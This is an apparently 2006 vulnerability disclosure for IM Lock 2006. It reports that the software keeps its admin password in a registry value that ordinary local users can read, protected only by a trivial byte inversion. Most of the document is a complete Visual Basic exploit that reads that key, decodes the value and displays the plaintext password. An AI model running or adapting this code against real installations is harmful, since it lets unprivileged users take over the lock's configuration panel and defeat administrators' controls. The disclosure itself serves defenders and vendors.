imlock2006.txt

`IM Lock 2006 - Insecure Registry Permission Vulnerability  
---------------------------------------------------------  
  
Application: IM Lock 2006  
Vendor: www.comvigo.com  
Corporation: Comvigo, Inc.  
Version: Latest: (2 March 2006) - Home Edition, Enterprise & Professional  
Description: IM Lock 2006 discloses passwords to local users.  
  
  
Background:  
===========  
Security Auditing & Management software, IM Lock controls and blocks access to   
Instant Messaging and peer to peer services that waste time and that can infect   
computers with viruses. Blocks all popular services: MSN Messenger, Yahoo Messenger,   
ICQ, AIM, Skype, eMule, iTunes, ... We use several algorithms to detect and lock   
applications, working portion of IM Lock is virtually invisible to the computer user.  
  
  
Vulnerability:  
==============  
Encrypted password is stored in the registry, this key is readable by non-privileged users   
on the system, so by decoding password, a malicious user could gain access of config panel.  
  
  
Exploit:  
========  
  
' ############################################################################  
' IM Lock 2006 - Local Password Encryption Weakness Exploit by fRoGGz  
' Versions: Home Edition, Enterprise & Professional  
' Application: IM Lock 2006  
' Distributor : Comvigo, Inc.  
' Link: http://www.comvigo.com  
' Vulnerable Description: IM Lock 2006 discloses passwords to local users.  
'  
' Discovered & Coded by fRoGGz  
' Credits to: SecuBox Labs - shadock.secubox.com  
'  
' ############################################################################  
  
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long  
  
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" _  
(ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long  
  
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" _  
(ByVal hKey As Long, _  
ByVal lpValueName As String, _  
ByVal lpReserved As Long, _  
lpType As Long, _  
lpData As Any, _  
lpcbData As Long) As Long  
  
Dim i As Integer  
Dim GetCrypt, Decrypt As String  
  
Public Function GrabBDR(hKey As Long, strPath As String, strValue As String) As String  
Dim keyhand As Long  
Dim lResult As Long  
Dim strBuf As String  
Dim lDataBufSize As Long  
Dim intZeroPos As Integer  
Dim sBuffer As String  
  
r = RegOpenKey(hKey, strPath, keyhand)  
lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)  
  
If lValueType = 1 Then  
strBuf = String(lDataBufSize, " ")  
lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)  
If lResult = ERROR_SUCCESS Then  
intZeroPos = InStr(strBuf, Chr$(0))  
If intZeroPos > 0 Then  
GrabBDR = Left$(strBuf, intZeroPos - 1)  
End If  
End If  
lResult = RegCloseKey(hKey)  
End If  
End Function  
  
Private Sub Form_Load()  
GetCrypt = GrabBDR(&H80000002, "SOFTWARE\Microsoft\SvcHst\msnvs", "prc")  
If GetCrypt <> "" Then  
For i = 1 To Len(GetCrypt)  
Decrypt = Decrypt & Chr(255 - Asc(Mid(GetCrypt, i, 1)))  
Next  
MsgBox "ENCRYPT PASSWORD FOUND !" & vbCrLf & "YOUR PASSWORD IS: " & Decrypt, _  
vbOKOnly, "Secubox Labs - Recovery"  
Else  
MsgBox "NO ENCRYPT PASSWORD FOUND !", vbCritical, "IM LOCK INSTALLED ?"  
End If  
End  
End Sub  
  
  
  
  
CREDiTS:  
========  
fRoGGz - unsecure[at]writeme[dot]com  
SecuBox Labs - secubox.shadock.net  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
--   
___________________________________________________  
Play 100s of games for FREE! http://games.mail.com/  
`